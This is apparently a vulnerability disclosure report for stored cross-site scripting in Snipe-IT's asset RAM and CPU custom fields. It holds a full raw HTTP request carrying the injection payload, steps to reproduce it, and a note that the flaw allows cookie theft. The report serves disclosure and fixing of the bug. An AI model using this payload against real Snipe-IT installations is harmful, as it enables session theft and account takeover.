Description

Multiple Stored XSS at ‘_snipeit_ram_3’ and ‘_snipeit_cpu_4’ in the multipart message of POST request when creating a new Asset or editing an existed Asset.

Proof of Concept

POST /hardware HTTP/1.1
Host: develop.snipeitapp.com
Connection: close
Content-Length: 2560
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://develop.snipeitapp.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary46mG0KnErxSyjdPS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://develop.snipeitapp.com/hardware/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: snipeitv5demo_session=0Eh7YSRhHibblEqPBiMIwljUeqCKslZfeRVyUL7Y; assetsListingTable.bs.table.pageNumber=1; assetsListingTable.bs.table.searchText=abcde; laravel_token=eyJpdiI6IklFZkVHc0JNU04rMzhIWThVdUR1SHc9PSIsInZhbHVlIjoiZlQxOTZXS3NuUGFBZlpKaUNuMGJlS2NuSjdpSm1yNmR3cXdpd3B4VkR5WFo5WlRtVmJoTll2U0JHbDQ1dVRHSlE5NGhnMGRqV3Z1ZTFNVGszUXZIMy9iVHNZQUdJdlhXbmt6OE9BdjdLMVFQMXJZQXVROE1YdTZHZC85MzJZcnhrWG1ya1BKL0pUVXpSS2Jhd0VRMXRvQXpPUkIrVXcvREQvdWwyYWlwQk9VRW1IRzdYcWZTOW1xRVM5RkFmZ0xPQit3QUVYVEpWOXhIa0l2cytmWUZ2a29sdGNxdHFWTGpSYzdGTGNLamQ3aFNiNXRMRlF6VTJBMlpLMEFWV1FCcUxTaW5SakRYc0VYYXRSMEtGNk5NVzRBNkMvV0lSanJoS1lja0lnMFZpbHhqK2NPNW1QckFtczhUcDhMYmd4L1MiLCJtYWMiOiIxYjg1MmQxZWJkOGU2MjU5MzQxZWFhMDNhYmMxMWUzNzJiYjYxOTk4ZmQyNmU1YzZiMWFhNDNiY2EyZTFkNTgyIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6Ik9jZkdjcmFWazlOd2s0N3ZXRlZsYkE9PSIsInZhbHVlIjoiMWY1MnBuNG9XUnVZQlg4aTZGYXUzVEJ3a1k2ajlLVXBoRkZKKzZacXE0K2xod1JEbkdQSmN1UzVMSnduQ2d2UGRiTm01dUlJK1BhOUxrMGNmVzRBS2hDY2JIK1JVR1ZTRGw5WFZFMDR3VExmaVg1WDY3MjRSbnl2UWRaNkF0WHIiLCJtYWMiOiI0OTM0NGY2MGFjYTU5ODEzYjYxZTNiYjdkNTBjM2RhZDdjNmMxZTAxYmY4MjdmNDFkNjAyYjc4NDU1MmFmNTc2IiwidGFnIjoiIn0%3D

------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_token"

KqyxmJgNorRhODZo5Inzo4FAzqdOvLscrtYuzbQd
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="company_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="asset_tags[1]"

PGS-IT-sdf35777
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="serials[1]"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="model_id"

8
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_ram_3"

"&gt;<img src>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_cpu_4"

"&gt;<img src>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_mac_address_5"

00:00:5e:00:53:af
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="status_id"

1
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="checkout_to_type"

user
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_user"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_asset"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_location"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="name"

abcde
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_date"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="supplier_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="order_number"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_cost"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="warranty_months"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="notes"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="rtd_location_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary46mG0KnErxSyjdPS--

Steps to Reproduce

• After login, in the dashboard, click on the Create New ->Asset on the top right corner to create a new asset
• Fill in the required information in all fields in the Create Asset page
• In the Model field, select a model which has theRAMandCPU fields that appear.
• In the RAM andCPU fields, input the payload "&gt;<img src>
• Click Save button
• In the left menu bar, click List All inAssetssection to go toAll Assets page
• Search for the name of the asset that you created above, an XSS popup will display

Impact

This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.

PoC Video: PoC